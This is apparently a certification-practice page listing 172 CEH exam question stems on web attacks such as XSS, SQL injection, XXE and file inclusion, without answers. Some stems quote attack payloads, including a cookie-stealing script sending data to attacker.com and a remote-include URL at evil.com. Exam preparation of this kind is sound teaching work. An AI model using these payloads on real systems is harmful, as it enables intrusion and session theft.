Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

HomeCertificationsCEHDomainsWeb Application and Injection Attacks
CEHFree — No Signup

Web Application and Injection Attacks

Practice CEH Web Application and Injection Attacks questions with full explanations on every answer.

172questions

Start practicing

Web Application and Injection Attacks — choose a session length

10 questions~10 min20 questions~20 min30 questions~30 min50 questions~50 min

Free · No account required

CEH Domains

Footprinting, Reconnaissance and ScanningEnumeration and System HackingMalware, Social Engineering and Network AttacksWeb Application and Injection AttacksIntroduction to Ethical HackingScanning Networks and EnumerationVulnerability Analysis and System HackingAdvanced Topics: Wireless, Cloud, IoT, CryptographyFootprinting and ReconnaissanceNetwork and Web Application AttacksWireless, IoT and Cloud SecurityCryptography and Malware AnalysisSocial Engineering and Physical Security

Practice Web Application and Injection Attacks questions

10Q20Q30Q50Q

All CEH Web Application and Injection Attacks questions (172)

Start session

Click any question to see the full explanation and answer options, or start a focused practice session above.

1

A security analyst notices that the web application returns different response times when a valid username is submitted versus an invalid one during login. Which type of vulnerability is likely being exploited?

2

Which of the following tools is commonly used to automate the detection and exploitation of SQL injection vulnerabilities?

3

A penetration tester intercepts the following request using Burp Suite: POST /change_password HTTP/1.1 Host: example.com Cookie: sessionid=abc123; SameSite=Lax Content-Type: application/x-www-form-urlencoded new_password=Hacker123 The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?

4

A web application allows users to upload profile pictures. An attacker uploads a file named "profile.php" containing malicious PHP code. When the attacker visits the uploaded file's URL, the code executes. Which vulnerability is being exploited?

5

An analyst observes the following log entry on a web server: GET /../../etc/passwd HTTP/1.1 200. Which type of attack is indicated?

6

During a penetration test, a tester uses the following payload in a search field: <script>alert(document.cookie)</script>. The payload is reflected in the response without sanitization. However, the tester notices that the attack only works when the payload is submitted via a POST request, not GET. Which type of XSS is this?

7

Which of the following is the primary purpose of using a CSRF token in a web application?

8

A web application uses user input in the following PHP code: include($_GET['page'] . '.php');. An attacker submits the URL: http://example.com/index.php?page=../../../../etc/passwd%00. Which two vulnerabilities are being attempted?

9

Which Burp Suite tool is most appropriate for modifying and re-sending a single HTTP request multiple times with different payloads to test for SQL injection?

10

A penetration tester finds that a web application accepts XML input and returns the parsed data in the response. The tester submits the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which vulnerability is being exploited?

11

An attacker attempts to log into a web application by trying many common passwords for a list of known usernames. Which type of authentication attack is this?

12

A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions would be most effective?

13

Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?

14

A web application is vulnerable to SQL injection. Which THREE of the following techniques can be used to extract data from the database using blind SQL injection?

15

Which TWO of the following are characteristics of stored (persistent) XSS?

16

A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?

17

Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?

18

A penetration tester needs to perform a brute-force attack on a web application login form. Which Burp Suite tool is specifically designed for automating parameterized attacks like password guessing?

19

A web application uses a parameter 'file' to include server-side files. The following request is intercepted: GET /page.php?file=../../../etc/passwd HTTP/1.1. The response contains the contents of /etc/passwd. This vulnerability is most likely which of the following?

20

Which of the following is a recommended defense against Cross-Site Request Forgery (CSRF) attacks?

21

A tester sends the following payload to a web application: %3Cscript%3Ealert('XSS')%3C/script%3E. The application echoes back the decoded payload in the response without sanitization. This behavior is typical of which type of vulnerability?

22

An attacker discovers that a web application's login form allows unlimited login attempts. The attacker uses a list of usernames and passwords obtained from a previous breach to gain access. This attack is known as:

23

A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?

24

An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:

25

Which of the following is a symptom of a successful command injection attack?

26

A web developer wants to mitigate CSRF attacks. Which of the following configurations for cookies is most effective when combined with CSRF tokens?

27

During an assessment, a tester discovers that the web application accepts XML input and returns the parsed data. The tester submits the following payload: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The response contains the contents of /etc/passwd. This vulnerability is known as:

28

Which TWO of the following are effective defenses against SQL injection attacks?

29

Which THREE of the following are common indicators of an ongoing brute-force attack against a web application?

30

Which TWO of the following are valid methods to exploit or test for Server-Side Request Forgery (SSRF)?

31

A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?

32

Which Burp Suite tool is specifically designed to automate customized attacks on web applications, such as brute-forcing login forms or fuzzing parameters?

33

During a penetration test, a tester uses SQLMap with the following command: 'sqlmap -u "http://target.com/page?id=1" --os-shell'. The target is a Linux server running MySQL. Which SQL injection technique will SQLMap likely attempt to use to achieve an OS shell?

34

A web application allows users to upload profile pictures. The application uses the filename provided by the user to save the file on the server. An attacker uploads a file named 'malicious.php%00.png' and the server saves it as 'malicious.php'. Which vulnerability is being exploited?

35

Which of the following is the BEST defense against brute-force attacks on a login form?

36

A penetration tester discovers that a web application includes the following code: 'include($_GET['page'] . '.php');' and the application is running on a Linux server. The tester attempts to exploit this by accessing 'index.php?page=../../etc/passwd'. What type of attack is this, and will it succeed?

37

An attacker wants to perform a CSRF attack against a banking application. The application uses SameSite cookies set to 'Strict'. The attacker hosts a malicious page on their own domain. When the victim visits the malicious page, which of the following statements is TRUE regarding the CSRF attack?

38

A web application uses XML to transmit data between client and server. A tester submits the following payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. The application returns the content of the /etc/passwd file in the response. Which vulnerability is present?

39

During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?

40

Which of the following is a common indicator of a stored (persistent) Cross-Site Scripting (XSS) attack?

41

A web application firewall (WAF) blocks requests containing ' UNION SELECT '. A penetration tester wants to bypass this restriction to perform a union-based SQL injection. Which of the following techniques is MOST likely to succeed?

42

An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?

43

Which TWO of the following are effective mitigations against Clickjacking attacks? (Choose 2)

44

Which THREE of the following are types of SQL injection attacks? (Choose 3)

45

Which TWO of the following are common tools used for web application security testing? (Choose 2)

46

A security analyst notices that a web application returns different page sizes when a valid user ID is submitted versus an invalid one in the URL parameter. Which type of vulnerability is most likely being exploited?

47

Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?

48

During a web application penetration test, a tester submits a comment containing '<script>alert("XSS")</script>' and the script executes for all users who view the comment. Which type of cross-site scripting (XSS) vulnerability is present?

49

A web application uses a URL parameter to fetch a file from the server, e.g., 'download.php?file=report.pdf'. An attacker changes the parameter to '../../etc/passwd' and retrieves the password file. This attack is known as:

50

Which of the following is the most effective defense against Cross-Site Request Forgery (CSRF) attacks?

51

An attacker intercepts a request and notices that the server reflects the value of the 'User-Agent' header in the response without sanitization. The attacker crafts a payload that triggers an alert box. This is an example of:

52

In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?

53

A penetration tester finds that a web application allows uploading a file with the name '../../var/www/html/shell.php'. The file is successfully written to the server. Which combination of vulnerabilities does this exploit?

54

Which of the following best describes a Server-Side Request Forgery (SSRF) attack?

55

A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?

56

Which of the following is a common defense against clickjacking attacks?

57

A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is most likely an attempt at which attack?

58

Which TWO of the following are types of SQL injection? (Select 2)

59

Which THREE of the following are effective mitigations against brute force attacks on web application login forms? (Select 3)

60

Which TWO of the following attacks can be prevented by properly validating and sanitizing user input? (Select 2)

61

A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?

62

Which OWASP Top 10 (2021) category describes the vulnerability where an application allows an attacker to include a remote file from an external server, leading to code execution or data disclosure?

63

During a web application penetration test, a tester uses Burp Suite's Repeater tool to manually manipulate a request and observe the response. After sending the same request multiple times, the application returns a 302 redirect pointing to a login page. What is the MOST likely cause?

64

A penetration tester is testing an IIS web server and wants to exploit a WebDAV misconfiguration to upload a web shell. Which HTTP method should the tester check to determine if WebDAV is enabled and allows file uploads?

65

A security analyst identifies a vulnerability where an attacker can include a local file such as '/etc/passwd' by manipulating the 'page' parameter in the URL: http://example.com/index.php?page=../../../../etc/passwd. What type of attack is this?

66

Which of the following is a primary purpose of the SameSite cookie attribute in mitigating CSRF attacks?

67

A penetration tester is using SQLMap to automate exploitation of a SQL injection vulnerability found in a login form. The tester wants to retrieve the names of all databases on the backend MySQL server. Which SQLMap flag should be used?

68

During a penetration test, the tester finds that the Apache server is configured with directory listing enabled on the /uploads directory. The tester navigates to http://example.com/uploads/ and sees a list of files. Which of the following is the MOST immediate security concern?

69

A web application is vulnerable to server-side request forgery (SSRF). An attacker sends a request that causes the server to make an internal HTTP request to http://169.254.169.254/latest/meta-data/. What is the attacker attempting to achieve?

70

Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?

71

A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?

72

During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?

73

Which TWO of the following are effective defenses against CSRF attacks? (Choose 2.)

74

Which THREE of the following are common indicators of an SQL injection attack? (Choose 3.)

75

Which TWO of the following are valid techniques used in password spraying attacks? (Choose 2.)

76

A security analyst notices that a web application returns different HTTP responses for valid and invalid usernames during login. Which attack is this behavior most likely facilitating?

77

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities?

78

A penetration tester discovers that a web application's search functionality reflects user input directly in the page source without sanitization. The tester crafts a URL like http://example.com/search?q=<script>alert('XSS')</script> and the script executes. This is an example of which type of XSS?

79

During a web application assessment, a tester intercepts a request and modifies the 'Referer' header. The application then performs a state-changing action without requiring a token. Which vulnerability is most likely present?

80

A web application allows users to access files using parameters like 'file=report.pdf'. A tester changes the parameter to '../../etc/passwd' and retrieves the system password file. This is an example of which attack?

81

A security team is implementing measures to prevent cross-site request forgery (CSRF) attacks. Which of the following is the most effective mitigation technique?

82

An analyst notices that a web application's login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is an example of which security control?

83

A web server is configured with WebDAV and allows PUT requests. An attacker uploads a .asp file and accesses it to execute code. Which tool or method is most directly associated with exploiting this misconfiguration?

84

A penetration tester uses a tool to intercept and modify HTTP/HTTPS requests in real-time between the browser and the web application. Which tool is being used?

85

An application is vulnerable to server-side request forgery (SSRF). An attacker exploits this to access internal services. Which of the following is a common indicator of SSRF?

86

Which of the following best describes the attack where an attacker uses a valid session token to impersonate a user without needing to authenticate?

87

A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)

88

Which THREE of the following are common types of SQL injection attacks? (Select three)

89

An application uses the SameSite cookie attribute. Which TWO of the following are valid values for this attribute and their purposes? (Select two)

90

During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)

91

A security analyst notices that a web application returns different error messages for valid and invalid usernames during login. Which type of attack is this application MOST vulnerable to?

92

During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?

93

Which of the following is the BEST defense against Cross-Site Request Forgery (CSRF) attacks?

94

A web application allows users to submit feedback that is stored in a database and displayed to other users without proper sanitization. A tester inputs '<script>alert(1)</script>' and it executes when other users view the feedback. Which type of XSS is this?

95

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?

96

A web server is found to have directory listing enabled for the /uploads folder. An attacker discovers a shell.php file uploaded earlier. Which attack is the attacker MOST likely to perform next?

97

A security team wants to test their web application for vulnerabilities. Which Burp Suite tool is BEST suited for automating attacks like brute-force or fuzzing?

98

A web application has an endpoint that takes a URL parameter and fetches content from that URL, returning it to the user. An attacker supplies 'file:///etc/passwd' and reads the server's passwd file. Which vulnerability is this?

99

Which of the following is a primary defense against SQL injection attacks?

100

An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?

101

A penetration tester finds that a web application includes files based on user input without proper validation. The tester supplies 'http://attacker.com/malicious.txt' and the application includes its content. Which vulnerability is this?

102

A web application uses an XML parser to process user-supplied XML documents. An attacker submits the following payload: <?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><root>&xxe;</root>. Which vulnerability is being exploited?

103

Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)

104

Which TWO of the following are commonly used to mitigate SQL injection vulnerabilities? (Select 2)

105

Which THREE of the following are valid defenses against CSRF attacks? (Select 3)

106

During a web application penetration test, a security analyst intercepts a request using Burp Suite and notices the following parameter in the URL: /profile?user_id=123. By changing the user_id to 124, the analyst is able to view another user's profile. Which vulnerability is being exploited?

107

A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?

108

Which of the following tools is specifically designed to automate the exploitation of SQL injection vulnerabilities and retrieve data from databases?

109

A penetration tester identifies a web page that reflects user input in the response without proper encoding. The input is submitted via a GET parameter. Which type of cross-site scripting (XSS) is MOST likely present?

110

A security analyst is reviewing HTTP response headers and notices the following: Set-Cookie: sessionId=abc123; SameSite=Lax. What is the primary purpose of the SameSite attribute?

111

During a penetration test, you find a web application that includes files using a parameter like /index.php?page=about. When you change the parameter to /etc/passwd, the application returns the contents of the password file. Which vulnerability is present?

112

Which HTTP method is commonly used by WebDAV to upload files to a web server, and if misconfigured, could allow an attacker to upload malicious scripts?

113

A web application takes a URL from user input and fetches the content to display on the page. An attacker submits a URL pointing to an internal service like http://localhost:8080/admin. The server retrieves the internal resource and returns it. What is this attack?

114

Which of the following Burp Suite tools is used to automatically fuzz web application inputs and identify common vulnerabilities like SQL injection and XSS?

115

A penetration tester attempts a SQL injection on a login form and receives no error messages, but notices a delay in the server response when injecting ' OR SLEEP(5)--. Which type of SQL injection is this?

116

After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?

117

A web application allows users to upload profile images. An attacker uploads a file named 'image.php.png' with malicious PHP code, and the server executes it as PHP. Which type of vulnerability is this?

118

Which TWO of the following are effective defenses against Cross-Site Request Forgery (CSRF) attacks? (Select 2)

119

Which THREE of the following are types of SQL injection attacks? (Select 3)

120

Which TWO of the following are common indicators of a command injection vulnerability? (Select 2)

121

A web application tester notices that the application reflects user input in the URL without proper encoding. The tester submits a payload <script>alert('xss')</script> in a search field and the script executes in the browser. Which type of XSS vulnerability is this MOST likely?

122

During a penetration test, a security analyst discovers that a web application uses sequential numeric identifiers in URLs (e.g., /profile?id=100). By modifying the id parameter, the analyst can access another user's profile data without authorization. Which vulnerability is being exploited?

123

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications?

124

An application allows users to upload XML files for processing. A tester uploads the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which attack is being performed?

125

A security analyst observes that a web application's login page responds with different HTTP status codes and response times for valid versus invalid usernames. This information leakage could be used to perform which type of authentication attack?

126

Which of the following is a primary defense mechanism against Cross-Site Request Forgery (CSRF) attacks?

127

A penetration tester uses Burp Suite Repeater to manually modify and resend HTTP requests to a web server. In which phase of the testing methodology is this tool most commonly employed?

128

While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 OK response. Which vulnerability is indicated, and what is the MOST likely impact?

129

Which of the following describes a Server-Side Request Forgery (SSRF) attack?

130

A web application tester uses the following Burp Suite feature to automatically send multiple requests with different payloads to test for common vulnerabilities. Which feature is being used?

131

An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?

132

A security analyst discovers that a web application's search box reflects user input without proper sanitization. However, the attacker must trick a victim into clicking a crafted link containing the malicious script. This vulnerability is classified as which type?

133

A penetration tester is assessing a web application and wants to manually test for SQL injection vulnerabilities. Which TWO tools or techniques are best suited for this task?

134

Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?

135

Which TWO of the following are common types of SQL injection attacks?

136

An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?

137

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page?id=1' --batch --dbs. Which of the following best describes what this command will do?

138

An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?

139

A security analyst notices that a web application uses sequential numeric IDs for user accounts (e.g., /profile?id=1001). By changing the ID to 1002, the analyst can view another user's profile. Which vulnerability is present?

140

During a web application penetration test, a tester uses Burp Suite's Intruder tool to automate a series of login attempts using a list of common passwords. Which attack type is being performed?

141

An analyst reviews the following HTTP response: HTTP/1.1 200 OK Set-Cookie: sessionid=abc123; SameSite=None; Secure ... <html><body><p>Welcome back!</p></body></html>. What possible vulnerability exists if the application does not use CSRF tokens?

142

Which of the following is the most effective defense against SQL injection attacks?

143

An attacker exploits an application by uploading a file that contains server-side script code, leading to arbitrary command execution on the web server. Which best describes this attack?

144

A security engineer observes that an internal web application uses XML to transmit data between systems. The engineer discovers that by sending a crafted XML payload, they can read sensitive files from the server's filesystem. Which attack is being performed?

145

Which Burp Suite tool is specifically designed to intercept and modify HTTP(S) traffic between the browser and the target web application?

146

A web application allows users to submit feedback that is stored in a database and later displayed to administrators. An attacker submits feedback containing <script>alert('stored')</script>. When an admin views the feedback page, the script executes. Which type of XSS is this?

147

An attacker uses the following URL pattern to access files: http://example.com/../../etc/passwd. Which attack is being attempted?

148

Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF) attacks? (Select 2)

149

Which THREE of the following are common indicators of a Server-Side Request Forgery (SSRF) vulnerability? (Select 3)

150

Which TWO of the following are common methods to detect SQL injection vulnerabilities in a web application? (Select 2)

151

A security analyst observes a web application returning database error messages containing table names and column names in the HTTP response. Which type of SQL injection is MOST likely being exploited?

152

During a web application test, a penetration tester intercepts a request using Burp Suite Proxy, modifies the 'Referer' header, and resends the request. The application processes the request despite the modified header. Which attack is the tester attempting to validate?

153

A web application allows users to view documents by specifying a filename in the URL, e.g., /getDocument?file=report.pdf. A tester changes the file parameter to '../../etc/passwd' and retrieves the system password file. Which vulnerability is being exploited?

154

A penetration tester uses SQLMap with the option '--technique=T --dbms=MySQL --level=5 --risk=3' against a login form. The tool returns results after a delay of several seconds per request. Which SQL injection technique is being used?

155

A security team deployed a web application firewall (WAF) that blocks requests containing SQL keywords like 'SELECT', 'UNION', and 'DROP'. An attacker bypasses the WAF by encoding the payload in base64 and using a SQL injection tool that decodes it server-side. Which mitigation would be MOST effective against this?

156

Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?

157

A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?

158

A web server running IIS 8.5 is found to have WebDAV enabled with write permissions. Which attack is MOST likely to be successful against this configuration?

159

An attacker crafts a link that, when clicked by an authenticated user, performs an unintended action on a web application where the user is logged in, such as changing their email address. The application uses a session cookie for authentication but does not include any anti-forgery tokens in forms. Which attack is this?

160

A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?

161

During a penetration test, a tester finds a web application that reflects user input in the page without sanitization. Which TWO types of XSS are potentially exploitable in this scenario?

162

An attacker is attempting to perform an Insecure Direct Object Reference (IDOR) attack on a web application. Which TWO conditions are necessary for this attack to succeed?

163

A pentester uses Burp Suite's Intruder to perform a brute-force attack on a login form. Which THREE of the following Intruder attack types would be appropriate for testing different payload combinations?

164

A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?

165

A penetration tester is performing a check for HTTP response splitting. Which THREE of the following conditions must be present for this attack to succeed?

166

A security analyst notices that a web application's search functionality returns database error messages in the response. The analyst suspects SQL injection. Which TWO techniques should the analyst use to confirm and exploit this vulnerability? (Choose TWO.)

167

During a web application penetration test, a tester discovers a file inclusion vulnerability. Which THREE of the following are potential impacts or exploitation scenarios? (Choose THREE.)

168

A security engineer is reviewing web server logs and finds the following request: GET /files/../../../etc/passwd HTTP/1.1. Which THREE attacks could be associated with this request? (Choose THREE.)

169

A penetration tester uses Burp Suite to intercept and modify web traffic. Which TWO features in Burp Suite would be MOST useful for performing a brute-force attack on a login form? (Choose TWO.)

170

A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)

171

A web application tester encounters a parameter that is reflected in the response without sanitization. The tester suspects XSS. Which TWO types of XSS could be present in this scenario? (Choose TWO.)

172

During a web application test, the tester finds that the application includes user-supplied file names in include() statements. Which TWO of the following are indicators of a Remote File Inclusion (RFI) vulnerability? (Choose TWO.)

Practice all 172 Web Application and Injection Attacks questions

Other CEH exam domains

Footprinting, Reconnaissance and ScanningEnumeration and System HackingMalware, Social Engineering and Network AttacksIntroduction to Ethical HackingScanning Networks and EnumerationVulnerability Analysis and System HackingAdvanced Topics: Wireless, Cloud, IoT, CryptographyFootprinting and ReconnaissanceNetwork and Web Application AttacksWireless, IoT and Cloud SecurityCryptography and Malware AnalysisSocial Engineering and Physical Security

Frequently asked questions

What does the Web Application and Injection Attacks domain cover on the CEH exam?

The Web Application and Injection Attacks domain covers the key concepts tested in this area of the CEH exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CEH domains — no account required.

How many Web Application and Injection Attacks questions are in the CEH question bank?

The Courseiva CEH question bank contains 172 questions in the Web Application and Injection Attacks domain. Click any question to see the full explanation and answer breakdown.

What is the best way to practice Web Application and Injection Attacks for CEH?

Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.

Can I practice only Web Application and Injection Attacks questions for CEH?

Yes — the session launcher on this page draws questions exclusively from the Web Application and Injection Attacks domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.

Free forever · No credit card required

Track your CEH domain progress

Save your results, see per-domain analytics, and get readiness scores — free, for every certification.

Sign Up Free

Free forever · Every certification included

Practice Session

10 questions20 questions30 questions50 questions

Study Resources

All DomainsPractice TestMock ExamFlashcardsStudy Guide

Related Exams

PT0-002CS0-003SY0-701200-201